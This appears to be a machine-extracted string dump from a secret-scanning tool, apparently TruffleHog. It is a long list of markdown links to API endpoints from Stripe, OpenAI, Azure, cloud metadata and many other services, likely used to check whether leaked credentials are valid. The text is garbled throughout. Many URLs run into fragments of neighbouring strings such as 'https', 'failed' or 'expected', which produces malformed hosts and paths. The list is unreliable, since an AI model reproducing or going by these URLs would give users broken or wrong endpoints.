[https://interseller.io/api/campaigns/listhttps](https%3A%2F%2Finterseller.io%2Fapi%2Fcampaigns%2Flisthttps)
[https://management.core.chinacloudapi.cn/https](https%3A%2F%2Fmanagement.core.chinacloudapi.cn%2Fhttps)
[https://mrticktock.com/app/api/is_timer_active](https%3A%2F%2Fmrticktock.com%2Fapp%2Fapi%2Fis_timer_active)
[https://oauth2.googleapis.com/device/codemssql](https%3A%2F%2Foauth2.googleapis.com%2Fdevice%2Fcodemssql)
[https://partner_settingscategories.statsGoogle](https%3A%2F%2Fpartner_settingscategories.statsGoogle)
[https://pkg.go.dev/cloud.google.com/go/storage](https%3A%2F%2Fpkg.go.dev%2Fcloud.google.com%2Fgo%2Fstorage)
[https://soccer.sportmonks.com/api/v2.0/leagues](https%3A%2F%2Fsoccer.sportmonks.com%2Fapi%2Fv2.0%2Fleagues)
[https://stripo.email/emailgeneration/v1/emails](https%3A%2F%2Fstripo.email%2Femailgeneration%2Fv1%2Femails)
[https://www.googleapis.com/oauth2/v3/tokeninfo](https%3A%2F%2Fwww.googleapis.com%2Foauth2%2Fv3%2Ftokeninfo)
[https://www.mapquestapi.com/datamanager/v2/get](https%3A%2F%2Fwww.mapquestapi.com%2Fdatamanager%2Fv2%2Fget)
[https://api.assemblyai.com/v2/transcripthttps](https%3A%2F%2Fapi.assemblyai.com%2Fv2%2Ftranscripthttps)
[https://api.browshot.com/api/v1/instance/list](https%3A%2F%2Fapi.browshot.com%2Fapi%2Fv1%2Finstance%2Flist)
[https://api.cashboardapp.com/account.xmlhttps](https%3A%2F%2Fapi.cashboardapp.com%2Faccount.xmlhttps)
[https://api.cloudconvert.com/v2/users/mehttps](https%3A%2F%2Fapi.cloudconvert.com%2Fv2%2Fusers%2Fmehttps)
[https://api.contentful.com/organizationshttps](https%3A%2F%2Fapi.contentful.com%2Forganizationshttps)
[https://api.foursquare.com/v2/venues/trending](https%3A%2F%2Fapi.foursquare.com%2Fv2%2Fvenues%2Ftrending)
[https://api.leadfeeder.com/accountsunexpected](https%3A%2F%2Fapi.leadfeeder.com%2Faccountsunexpected)
[https://api.nicereply.com/v1/users/statshttps](https%3A%2F%2Fapi.nicereply.com%2Fv1%2Fusers%2Fstatshttps)
[https://api.oopspam.com/v1/spamdetectionhttps](https%3A%2F%2Fapi.oopspam.com%2Fv1%2Fspamdetectionhttps)
[https://api.openai.com/v1/organizationsfailed](https%3A%2F%2Fapi.openai.com%2Fv1%2Forganizationsfailed)
[https://api.pdfshift.io/v3/credits/usagehttps](https%3A%2F%2Fapi.pdfshift.io%2Fv3%2Fcredits%2Fusagehttps)
[https://api.replicate.com/v1/predictionshttps](https%3A%2F%2Fapi.replicate.com%2Fv1%2Fpredictionshttps)
[https://api.scaleway.com/instance/v1/zones/fr](https%3A%2F%2Fapi.scaleway.com%2Finstance%2Fv1%2Fzones%2Ffr)
[https://api.stripe.com/v1/account/login_links](https%3A%2F%2Fapi.stripe.com%2Fv1%2Faccount%2Flogin_links)
[https://api.todoist.com/rest/v2/projectshttps](https%3A%2F%2Fapi.todoist.com%2Frest%2Fv2%2Fprojectshttps)
[https://api.transferwise.com/v2/profileshttps](https%3A%2F%2Fapi.transferwise.com%2Fv2%2Fprofileshttps)
[https://api.twelvedata.com/earliest_timestamp](https%3A%2F%2Fapi.twelvedata.com%2Fearliest_timestamp)
[https://api.zerotier.com/api/v1/networkBranch](https%3A%2F%2Fapi.zerotier.com%2Fapi%2Fv1%2FnetworkBranch)
[https://app.besnappy.com/api/v1/accountshttps](https%3A%2F%2Fapp.besnappy.com%2Fapi%2Fv1%2Faccountshttps)
[https://app.karmacrm.com/api/v3/contacts.json](https%3A%2F%2Fapp.karmacrm.com%2Fapi%2Fv3%2Fcontacts.json)
[https://app.timecamp.com/third_party/api/user](https%3A%2F%2Fapp.timecamp.com%2Fthird_party%2Fapi%2Fuser)
[https://cloud.digitalocean.com/v1/oauth/token](https%3A%2F%2Fcloud.digitalocean.com%2Fv1%2Foauth%2Ftoken)
[https://cloud.iexapis.com/v1/stock/aapl/quote](https%3A%2F%2Fcloud.iexapis.com%2Fv1%2Fstock%2Faapl%2Fquote)
[https://connect.squareup.com/oauth2/authorize](https%3A%2F%2Fconnect.squareup.com%2Foauth2%2Fauthorize)
[https://docs.stripe.com/api/credit_notes/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcredit_notes%2Flist)
[https://github.com/trufflesecurity/trufflehog](https%3A%2F%2Fgithub.com%2Ftrufflesecurity%2Ftrufflehog)
[https://google.com&width=1920&height=1080xoxb](https%3A%2F%2Fgoogle.com%26width%3D1920%26height%3D1080xoxb)
[https://howtorotate.com/docs/tutorials/slack/](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fslack%2F)
[https://iamcredentials.UNIVERSE_DOMAIN/failed](https%3A%2F%2Fiamcredentials.UNIVERSE_DOMAIN%2Ffailed)
[https://iamcredentials.googleapis.com/openpgp](https%3A%2F%2Fiamcredentials.googleapis.com%2Fopenpgp)
[https://management.microsoftazure.de/expected](https%3A%2F%2Fmanagement.microsoftazure.de%2Fexpected)
[https://opentelemetry.io/schemas/1.17.0grpclb](https%3A%2F%2Fopentelemetry.io%2Fschemas%2F1.17.0grpclb)
[https://restpack.io/api/screenshot/usagehttps](https%3A%2F%2Frestpack.io%2Fapi%2Fscreenshot%2Fusagehttps)
[https://trufflesecurity.com/canariesGetGeoAPI](https%3A%2F%2Ftrufflesecurity.com%2FcanariesGetGeoAPI)
[http://169.254.169.254/latest/api/tokennonce](http%3A%2F%2F169.254.169.254%2Flatest%2Fapi%2Ftokennonce)
[http://www.collada.org/2005/11/COLLADASchema](http%3A%2F%2Fwww.collada.org%2F2005%2F11%2FCOLLADASchema)
[https://api.atlassian.com/admin/v1/orgshttps](https%3A%2F%2Fapi.atlassian.com%2Fadmin%2Fv1%2Forgshttps)
[https://api.capsulecrm.com/api/v2/usershttps](https%3A%2F%2Fapi.capsulecrm.com%2Fapi%2Fv2%2Fusershttps)
[https://api.cloudsmith.io/v1/user/self/https](https%3A%2F%2Fapi.cloudsmith.io%2Fv1%2Fuser%2Fself%2Fhttps)
[https://api.conversiontools.io/v1/taskshttps](https%3A%2F%2Fapi.conversiontools.io%2Fv1%2Ftaskshttps)
[https://api.crowdin.com/api/v2/storageshttps](https%3A%2F%2Fapi.crowdin.com%2Fapi%2Fv2%2Fstorageshttps)
[https://api.digitalocean.com/v2/accounthttps](https%3A%2F%2Fapi.digitalocean.com%2Fv2%2Faccounthttps)
[https://api.enigma.com/businesses/matchhttps](https%3A%2F%2Fapi.enigma.com%2Fbusinesses%2Fmatchhttps)
[https://api.fmfw.io/api/3/spot/balancegithub](https%3A%2F%2Fapi.fmfw.io%2Fapi%2F3%2Fspot%2Fbalancegithub)
[https://api.fullstory.com/operations/v1https](https%3A%2F%2Fapi.fullstory.com%2Foperations%2Fv1https)
[https://api.getresponse.com/v3/accountshttps](https%3A%2F%2Fapi.getresponse.com%2Fv3%2Faccountshttps)
[https://api.holistic.dev/api/v1/projecthttps](https%3A%2F%2Fapi.holistic.dev%2Fapi%2Fv1%2Fprojecthttps)
[https://api.instamojo.com/oauth2/token/https](https%3A%2F%2Fapi.instamojo.com%2Foauth2%2Ftoken%2Fhttps)
[https://api.loyverse.com/v1.0/merchant/https](https%3A%2F%2Fapi.loyverse.com%2Fv1.0%2Fmerchant%2Fhttps)
[https://api.mailjet.com/v3/REST/messagehttps](https%3A%2F%2Fapi.mailjet.com%2Fv3%2FREST%2Fmessagehttps)
[https://api.openai.com/v1/images/generations](https%3A%2F%2Fapi.openai.com%2Fv1%2Fimages%2Fgenerations)
[https://api.opencagedata.com/geocode/v1/json](https%3A%2F%2Fapi.opencagedata.com%2Fgeocode%2Fv1%2Fjson)
[https://api.ramp.com/developer/v1/tokenhttps](https%3A%2F%2Fapi.ramp.com%2Fdeveloper%2Fv1%2Ftokenhttps)
[https://api.stripe.com/v1/terminal/locations](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fterminal%2Flocations)
[https://api.wistia.com/v1/stats/account.json](https%3A%2F%2Fapi.wistia.com%2Fv1%2Fstats%2Faccount.json)
[https://apis.paralleldots.com/v4/intenterror](https%3A%2F%2Fapis.paralleldots.com%2Fv4%2Fintenterror)
[https://app.ayrshare.com/api/analytics/links](https%3A%2F%2Fapp.ayrshare.com%2Fapi%2Fanalytics%2Flinks)
[https://app.zenscrape.com/api/v1/statushttps](https%3A%2F%2Fapp.zenscrape.com%2Fapi%2Fv1%2Fstatushttps)
[https://base.zenkit.com/api/v1/users/mehttps](https%3A%2F%2Fbase.zenkit.com%2Fapi%2Fv1%2Fusers%2Fmehttps)
[https://dashboard.chatfuel.com/api/botshttps](https%3A%2F%2Fdashboard.chatfuel.com%2Fapi%2Fbotshttps)
[https://docs.stripe.com/api/customers/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcustomers%2Fupdate)
[https://docs.stripe.com/api/sources/retrieve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fsources%2Fretrieve)
[https://docs.stripe.com/api/tax_rates/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftax_rates%2Fcreate)
[https://docs.stripe.com/api/test_clocks/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftest_clocks%2Flist)
[https://docs.stripe.com/api/transfers/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftransfers%2Fcreate)
[https://onfleet.com/api/v2/organizationhttps](https%3A%2F%2Fonfleet.com%2Fapi%2Fv2%2Forganizationhttps)
[https://search.censys.io/api/v1/accounthttps](https%3A%2F%2Fsearch.censys.io%2Fapi%2Fv1%2Faccounthttps)
[https://sslmate.com/api/v2/certs/example.com](https%3A%2F%2Fsslmate.com%2Fapi%2Fv2%2Fcerts%2Fexample.com)
[https://storage.googleapis.com/storage/v1/b/](https%3A%2F%2Fstorage.googleapis.com%2Fstorage%2Fv1%2Fb%2F)
[https://v3.api.hypertrack.com/trips/expected](https%3A%2F%2Fv3.api.hypertrack.com%2Ftrips%2Fexpected)
[https://www.diggernaut.com/api/projectshttps](https%3A%2F%2Fwww.diggernaut.com%2Fapi%2Fprojectshttps)
[https://www.streak.com/api/v1/pipelineshttps](https%3A%2F%2Fwww.streak.com%2Fapi%2Fv1%2Fpipelineshttps)
[https://www.versioneye.com/api/v1/scanshttps](https%3A%2F%2Fwww.versioneye.com%2Fapi%2Fv1%2Fscanshttps)
[https://api.aeroworkflow.com/api/unexpected](https%3A%2F%2Fapi.aeroworkflow.com%2Fapi%2Funexpected)
[https://api.apiscience.com/v1/monitorshttps](https%3A%2F%2Fapi.apiscience.com%2Fv1%2Fmonitorshttps)
[https://api.artsy.net/api/tokens/xapp_token](https%3A%2F%2Fapi.artsy.net%2Fapi%2Ftokens%2Fxapp_token)
[https://api.baremetrics.com/v1/accounthttps](https%3A%2F%2Fapi.baremetrics.com%2Fv1%2Faccounthttps)
[https://api.iconfinder.com/v4/iconsetslogin](https%3A%2F%2Fapi.iconfinder.com%2Fv4%2Ficonsetslogin)
[https://api.lexigram.io/v1/lexigraph/search](https%3A%2F%2Fapi.lexigram.io%2Fv1%2Flexigraph%2Fsearch)
[https://api.mailerlite.com/api/v2/campaigns](https%3A%2F%2Fapi.mailerlite.com%2Fapi%2Fv2%2Fcampaigns)
[https://api.na1.insightly.com/v3.1/Contacts](https%3A%2F%2Fapi.na1.insightly.com%2Fv3.1%2FContacts)
[https://api.polygon.io/v2/reference/locales](https%3A%2F%2Fapi.polygon.io%2Fv2%2Freference%2Flocales)
[https://api.prefect.cloud/auth/loginInclude](https%3A%2F%2Fapi.prefect.cloud%2Fauth%2FloginInclude)
[https://api.pulumi.com/api/user/stackshttps](https%3A%2F%2Fapi.pulumi.com%2Fapi%2Fuser%2Fstackshttps)
[https://api.pushbullet.com/v2/users/mehttps](https%3A%2F%2Fapi.pushbullet.com%2Fv2%2Fusers%2Fmehttps)
[https://api.qualaroo.com/api/v1/nudgeshttps](https%3A%2F%2Fapi.qualaroo.com%2Fapi%2Fv1%2Fnudgeshttps)
[https://api.screenshotlayer.com/api/capture](https%3A%2F%2Fapi.screenshotlayer.com%2Fapi%2Fcapture)
[https://api.securitytrails.com/v1/pinghttps](https%3A%2F%2Fapi.securitytrails.com%2Fv1%2Fpinghttps)
[https://api.storyblok.com/v1/cdn/spaces/me/](https%3A%2F%2Fapi.storyblok.com%2Fv1%2Fcdn%2Fspaces%2Fme%2F)
[https://api.stripe.com/v1/apple_pay/domains](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fapple_pay%2Fdomains)
[https://api.stripe.com/v1/checkout/sessions](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fcheckout%2Fsessions)
[https://api.stripe.com/v1/customer_sessions](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fcustomer_sessions)
[https://api.stripe.com/v1/webhook_endpoints](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fwebhook_endpoints)
[https://api.tickettailor.com/v1/ordershttps](https%3A%2F%2Fapi.tickettailor.com%2Fv1%2Fordershttps)
[https://api.websitepulse.com/textserver.php](https%3A%2F%2Fapi.websitepulse.com%2Ftextserver.php)
[https://api.zipbooks.com/v2/auth/loginTotal](https%3A%2F%2Fapi.zipbooks.com%2Fv2%2Fauth%2FloginTotal)
[https://auth.freshbooks.com/oauth/authorize](https%3A%2F%2Fauth.freshbooks.com%2Foauth%2Fauthorize)
[https://docs.stripe.com/api/disputes/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fdisputes%2Fupdate)
[https://docs.stripe.com/api/invoices/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Finvoices%2Fcreate)
[https://docs.stripe.com/api/products/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fproducts%2Fcreate)
[https://docs.stripe.com/api/tokens/retrieve](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftokens%2Fretrieve)
[https://finnhub.io/api/v1/calendar/economic](https%3A%2F%2Ffinnhub.io%2Fapi%2Fv1%2Fcalendar%2Feconomic)
[https://github.com/login/oauth/authorizekey](https%3A%2F%2Fgithub.com%2Flogin%2Foauth%2Fauthorizekey)
[https://howtorotate.com/docs/tutorials/npm/](https%3A%2F%2Fhowtorotate.com%2Fdocs%2Ftutorials%2Fnpm%2F)
[https://login.microsoftonline.com/semaphore](https%3A%2F%2Flogin.microsoftonline.com%2Fsemaphore)
[https://rest.textmagic.com/api/v2/userhttps](https%3A%2F%2Frest.textmagic.com%2Fapi%2Fv2%2Fuserhttps)
[https://restpack.io/api/html2pdf/usagehttps](https%3A%2F%2Frestpack.io%2Fapi%2Fhtml2pdf%2Fusagehttps)
[https://us.qubole.com/api/v1.2/accounthttps](https%3A%2F%2Fus.qubole.com%2Fapi%2Fv1.2%2Faccounthttps)
[https://www.dnscheck.co/api/v1/groups/https](https%3A%2F%2Fwww.dnscheck.co%2Fapi%2Fv1%2Fgroups%2Fhttps)
[https://api.anthropic.com/v1/messageshttps](https%3A%2F%2Fapi.anthropic.com%2Fv1%2Fmessageshttps)
[https://api.app.shortcut.com/api/v3/member](https%3A%2F%2Fapi.app.shortcut.com%2Fapi%2Fv3%2Fmember)
[https://api.bugsnag.com/user/organizations](https%3A%2F%2Fapi.bugsnag.com%2Fuser%2Forganizations)
[https://api.calorieninjas.com/v1/nutrition](https%3A%2F%2Fapi.calorieninjas.com%2Fv1%2Fnutrition)
[https://api.cloudimage.com/invalidatehttps](https%3A%2F%2Fapi.cloudimage.com%2Finvalidatehttps)
[https://api.currentsapi.services/v1/latest](https%3A%2F%2Fapi.currentsapi.services%2Fv1%2Flatest)
[https://api.geoapify.com/v1/geocode/search](https%3A%2F%2Fapi.geoapify.com%2Fv1%2Fgeocode%2Fsearch)
[https://api.getgeoapi.com/v2/currency/list](https%3A%2F%2Fapi.getgeoapi.com%2Fv2%2Fcurrency%2Flist)
[https://api.monkeylearn.com/v3/classifiers](https%3A%2F%2Fapi.monkeylearn.com%2Fv3%2Fclassifiers)
[https://api.pipedream.com/v1/users/mehttps](https%3A%2F%2Fapi.pipedream.com%2Fv1%2Fusers%2Fmehttps)
[https://api.shotstack.io/stage/renderhttps](https%3A%2F%2Fapi.shotstack.io%2Fstage%2Frenderhttps)
[https://api.shutterstock.com/v2/userhelper](https%3A%2F%2Fapi.shutterstock.com%2Fv2%2Fuserhelper)
[https://api.sigopt.com/v1/experimentshttps](https%3A%2F%2Fapi.sigopt.com%2Fv1%2Fexperimentshttps)
[https://api.smartsheet.com/2.0/sheetshttps](https%3A%2F%2Fapi.smartsheet.com%2F2.0%2Fsheetshttps)
[https://api.spoonacular.com/recipes/random](https%3A%2F%2Fapi.spoonacular.com%2Frecipes%2Frandom)
[https://api.stitchdata.com/v4/sourceshttps](https%3A%2F%2Fapi.stitchdata.com%2Fv4%2Fsourceshttps)
[https://api.stormglass.io/v2/weather/point](https%3A%2F%2Fapi.stormglass.io%2Fv2%2Fweather%2Fpoint)
[https://api.stripe.com/v1/terminal/readers](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fterminal%2Freaders)
[https://api.tradier.com/v1/watchlistshttps](https%3A%2F%2Fapi.tradier.com%2Fv1%2Fwatchlistshttps)
[https://api.uptimerobot.com/v2/getMonitors](https%3A%2F%2Fapi.uptimerobot.com%2Fv2%2FgetMonitors)
[https://api.us2.sumologic.com/api/v1/users](https%3A%2F%2Fapi.us2.sumologic.com%2Fapi%2Fv1%2Fusers)
[https://api.vercel.com/www/userenumerating](https%3A%2F%2Fapi.vercel.com%2Fwww%2Fuserenumerating)
[https://api.voicegain.ai/v1/sa/confighttps](https%3A%2F%2Fapi.voicegain.ai%2Fv1%2Fsa%2Fconfighttps)
[https://api.web3.storage/user/uploadshttps](https%3A%2F%2Fapi.web3.storage%2Fuser%2Fuploadshttps)
[https://app.apacta.com/api/v1/time_entries](https%3A%2F%2Fapp.apacta.com%2Fapi%2Fv1%2Ftime_entries)
[https://app.asana.com/api/1.0/users/meRead](https%3A%2F%2Fapp.asana.com%2Fapi%2F1.0%2Fusers%2FmeRead)
[https://app.launchdarkly.com/api/v2/caller](https%3A%2F%2Fapp.launchdarkly.com%2Fapi%2Fv2%2Fcaller)
[https://batch.core.usgovcloudapi.net/https](https%3A%2F%2Fbatch.core.usgovcloudapi.net%2Fhttps)
[https://database.chinacloudapi.cn/expected](https%3A%2F%2Fdatabase.chinacloudapi.cn%2Fexpected)
[https://docs.stripe.com/api/charges/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcharges%2Fupdate)
[https://docs.stripe.com/api/coupons/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcoupons%2Fcreate)
[https://docs.stripe.com/api/customers/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcustomers%2Flist)
[https://docs.stripe.com/api/payouts/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fpayouts%2Fcreate)
[https://docs.stripe.com/api/sources/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fsources%2Fupdate)
[https://docs.stripe.com/api/tax_ids/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftax_ids%2Fcreate)
[https://docs.stripe.com/api/tax_rates/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftax_rates%2Flist)
[https://docs.stripe.com/api/transfers/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftransfers%2Flist)
[https://management.usgovcloudapi.net/https](https%3A%2F%2Fmanagement.usgovcloudapi.net%2Fhttps)
[https://rest.clicksend.com/v3/accounthttps](https%3A%2F%2Frest.clicksend.com%2Fv3%2Faccounthttps)
[https://rest.messagebird.com/messageshttps](https%3A%2F%2Frest.messagebird.com%2Fmessageshttps)
[https://rubygems.org/api/v1/gems.jsonerror](https%3A%2F%2Frubygems.org%2Fapi%2Fv1%2Fgems.jsonerror)
[https://servicebus.usgovcloudapi.net/https](https%3A%2F%2Fservicebus.usgovcloudapi.net%2Fhttps)
[https://trufflesecurity.com/contacted25519](https%3A%2F%2Ftrufflesecurity.com%2Fcontacted25519)
[https://webexapis.com/v1/access_tokenhttps](https%3A%2F%2Fwebexapis.com%2Fv1%2Faccess_tokenhttps)
[https://www.clinchpad.com/api/v1/pipelines](https%3A%2F%2Fwww.clinchpad.com%2Fapi%2Fv1%2Fpipelines)
[https://www.eventbriteapi.com/v3/users/me/](https%3A%2F%2Fwww.eventbriteapi.com%2Fv3%2Fusers%2Fme%2F)
[https://www.formbucket.com/v1/profilehttps](https%3A%2F%2Fwww.formbucket.com%2Fv1%2Fprofilehttps)
[https://api.agora.io/dev/v1/projectshttps](https%3A%2F%2Fapi.agora.io%2Fdev%2Fv1%2Fprojectshttps)
[https://api.clarifai.com/v2/users/mehttps](https%3A%2F%2Fapi.clarifai.com%2Fv2%2Fusers%2Fmehttps)
[https://api.dareboost.com/0.8/confighttps](https%3A%2F%2Fapi.dareboost.com%2F0.8%2Fconfighttps)
[https://api.exchangeratesapi.io/v1/latest](https%3A%2F%2Fapi.exchangeratesapi.io%2Fv1%2Flatest)
[https://api.hellosign.com/v3/accounthttps](https%3A%2F%2Fapi.hellosign.com%2Fv3%2Faccounthttps)
[https://api.html2pdf.app/v1/generatehttps](https%3A%2F%2Fapi.html2pdf.app%2Fv1%2Fgeneratehttps)
[https://api.lemonsqueezy.com/v1/products/](https%3A%2F%2Fapi.lemonsqueezy.com%2Fv1%2Fproducts%2F)
[https://api.mailmodo.com/api/v1/campaigns](https%3A%2F%2Fapi.mailmodo.com%2Fapi%2Fv1%2Fcampaigns)
[https://api.netlify.com/api/v1/siteshttps](https%3A%2F%2Fapi.netlify.com%2Fapi%2Fv1%2Fsiteshttps)
[https://api.nftport.xyz/me/contractshttps](https%3A%2F%2Fapi.nftport.xyz%2Fme%2Fcontractshttps)
[https://api.rebrandly.com/v1/accounthttps](https%3A%2F%2Fapi.rebrandly.com%2Fv1%2Faccounthttps)
[https://api.request.finance/invoiceshttps](https%3A%2F%2Fapi.request.finance%2Finvoiceshttps)
[https://api.ritekit.com/v1/stats/multiple](https%3A%2F%2Fapi.ritekit.com%2Fv1%2Fstats%2Fmultiple)
[https://api.skrapp.io/api/v2/accounthttps](https%3A%2F%2Fapi.skrapp.io%2Fapi%2Fv2%2Faccounthttps)
[https://api.stripe.com/v1/payment_intents](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fpayment_intents)
[https://api.stripe.com/v1/promotion_codes](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fpromotion_codes)
[https://api.supabase.com/v1/projectshttps](https%3A%2F%2Fapi.supabase.com%2Fv1%2Fprojectshttps)
[https://api.taxjar.com/v2/categorieshttps](https%3A%2F%2Fapi.taxjar.com%2Fv2%2Fcategorieshttps)
[https://api.us1.signalfx.com/v2/dashboard](https%3A%2F%2Fapi.us1.signalfx.com%2Fv2%2Fdashboard)
[https://api.webscraper.io/api/v1/sitemaps](https%3A%2F%2Fapi.webscraper.io%2Fapi%2Fv1%2Fsitemaps)
[https://api.yelp.com/v3/businesses/search](https%3A%2F%2Fapi.yelp.com%2Fv3%2Fbusinesses%2Fsearch)
[https://app.eraser.io/api/render/elements](https%3A%2F%2Fapp.eraser.io%2Fapi%2Frender%2Felements)
[https://app.nimble.com/api/v1/myselfhttps](https%3A%2F%2Fapp.nimble.com%2Fapi%2Fv1%2Fmyselfhttps)
[https://app.zipcodebase.com/api/v1/search](https%3A%2F%2Fapp.zipcodebase.com%2Fapi%2Fv1%2Fsearch)
[https://docs.stripe.com/api/account_links](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Faccount_links)
[https://docs.stripe.com/api/disputes/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fdisputes%2Flist)
[https://docs.stripe.com/api/invoices/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Finvoices%2Flist)
[https://docs.stripe.com/api/prices/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fprices%2Fcreate)
[https://docs.stripe.com/api/products/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fproducts%2Flist)
[https://docs.stripe.com/api/quotes/update](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fquotes%2Fupdate)
[https://docs.stripe.com/api/topups/create](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftopups%2Fcreate)
[https://dynalist.io/api/v1/file/listhttps](https%3A%2F%2Fdynalist.io%2Fapi%2Fv1%2Ffile%2Flisthttps)
[https://extractorapi.com/api/v1/extractor](https%3A%2F%2Fextractorapi.com%2Fapi%2Fv1%2Fextractor)
[https://go.urbanairship.com/api/schedules](https%3A%2F%2Fgo.urbanairship.com%2Fapi%2Fschedules)
[https://hooman.pipedrive.com/api/v1/users](https%3A%2F%2Fhooman.pipedrive.com%2Fapi%2Fv1%2Fusers)
[https://iamcredentials.googleapis.com/v1/](https%3A%2F%2Fiamcredentials.googleapis.com%2Fv1%2F)
[https://management.chinacloudapi.cn/https](https%3A%2F%2Fmanagement.chinacloudapi.cn%2Fhttps)
[https://management.core.windows.net/https](https%3A%2F%2Fmanagement.core.windows.net%2Fhttps)
[https://microsoftgraph.chinacloudapi.cngo](https%3A%2F%2Fmicrosoftgraph.chinacloudapi.cngo)
[https://oss.trufflehog.org/updatesillegal](https%3A%2F%2Foss.trufflehog.org%2Fupdatesillegal)
[https://packagecloud.io/api/v1/reposhttps](https%3A%2F%2Fpackagecloud.io%2Fapi%2Fv1%2Freposhttps)
[https://powrbot.com/api/v1/search/single/](https%3A%2F%2Fpowrbot.com%2Fapi%2Fv1%2Fsearch%2Fsingle%2F)
[https://rest.coinapi.io/v1/exchangeshttps](https%3A%2F%2Frest.coinapi.io%2Fv1%2Fexchangeshttps)
[https://sandbox.impala.travel/v1/bookings](https%3A%2F%2Fsandbox.impala.travel%2Fv1%2Fbookings)
[https://servicebus.chinacloudapi.cn/https](https%3A%2F%2Fservicebus.chinacloudapi.cn%2Fhttps)
[https://shot.screenshotapi.net/screenshot](https%3A%2F%2Fshot.screenshotapi.net%2Fscreenshot)
[https://trufflesecurity.com/trufflehogmax](https%3A%2F%2Ftrufflesecurity.com%2Ftrufflehogmax)
[https://us1.locationiq.com/v1/reverse.php](https%3A%2F%2Fus1.locationiq.com%2Fv1%2Freverse.php)
[https://www.buddyns.com/api/v2/zone/https](https%3A%2F%2Fwww.buddyns.com%2Fapi%2Fv2%2Fzone%2Fhttps)
[https://www.nuget.org/api/v2/packagehttps](https%3A%2F%2Fwww.nuget.org%2Fapi%2Fv2%2Fpackagehttps)
[http://169.254.169.254BalancerAttributes](http%3A%2F%2F169.254.169.254BalancerAttributes)
[http://ocsp.snowflakecomputing.comFailed](http%3A%2F%2Focsp.snowflakecomputing.comFailed)
[https://api.appoptics.com/v1/metricshost](https%3A%2F%2Fapi.appoptics.com%2Fv1%2Fmetricshost)
[https://api.apptivo.com/app/dao/v6/leads](https%3A%2F%2Fapi.apptivo.com%2Fapp%2Fdao%2Fv6%2Fleads)
[https://api.autoklose.com/api/campaigns/](https%3A%2F%2Fapi.autoklose.com%2Fapi%2Fcampaigns%2F)
[https://api.aviationstack.com/v1/flights](https%3A%2F%2Fapi.aviationstack.com%2Fv1%2Fflights)
[https://api.bulksms.com/v1/messageshttps](https%3A%2F%2Fapi.bulksms.com%2Fv1%2Fmessageshttps)
[https://api.clickup.com/api/v2/userhttps](https%3A%2F%2Fapi.clickup.com%2Fapi%2Fv2%2Fuserhttps)
[https://api.clockify.me/api/v1/userhttps](https%3A%2F%2Fapi.clockify.me%2Fapi%2Fv1%2Fuserhttps)
[https://api.codeclimate.com/v1/userhttps](https%3A%2F%2Fapi.codeclimate.com%2Fv1%2Fuserhttps)
[https://api.dittowords.com/variantshttps](https%3A%2F%2Fapi.dittowords.com%2Fvariantshttps)
[https://api.ers.usda.gov/data/arms/state](https%3A%2F%2Fapi.ers.usda.gov%2Fdata%2Farms%2Fstate)
[https://api.fastly.com/current_userhttps](https%3A%2F%2Fapi.fastly.com%2Fcurrent_userhttps)
[https://api.getpostman.com/environments/](https%3A%2F%2Fapi.getpostman.com%2Fenvironments%2F)
[https://api.hubapi.com/contacts/v1/lists](https%3A%2F%2Fapi.hubapi.com%2Fcontacts%2Fv1%2Flists)
[https://api.mixmax.com/v1/users/meNvidia](https%3A%2F%2Fapi.mixmax.com%2Fv1%2Fusers%2FmeNvidia)
[https://api.mux.com/video/v1/assetshttps](https%3A%2F%2Fapi.mux.com%2Fvideo%2Fv1%2Fassetshttps)
[https://api.myintervals.com/client/https](https%3A%2F%2Fapi.myintervals.com%2Fclient%2Fhttps)
[https://api.newscatcherapi.com/v2/search](https%3A%2F%2Fapi.newscatcherapi.com%2Fv2%2Fsearch)
[https://api.openai.com/v1/threads/1error](https%3A%2F%2Fapi.openai.com%2Fv1%2Fthreads%2F1error)
[https://api.positionstack.com/v1/forward](https%3A%2F%2Fapi.positionstack.com%2Fv1%2Fforward)
[https://api.sendgrid.com/v3/scopesfailed](https%3A%2F%2Fapi.sendgrid.com%2Fv3%2Fscopesfailed)
[https://api.squarespace.com/1.0/profiles](https%3A%2F%2Fapi.squarespace.com%2F1.0%2Fprofiles)
[https://api.stripe.com/v1/climate/orders](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fclimate%2Forders)
[https://api.stripe.com/v1/ephemeral_keys](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fephemeral_keys)
[https://api.stripe.com/v1/shipping_rates](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fshipping_rates)
[https://api.thousandeyes.com/v6/endpoint](https%3A%2F%2Fapi.thousandeyes.com%2Fv6%2Fendpoint)
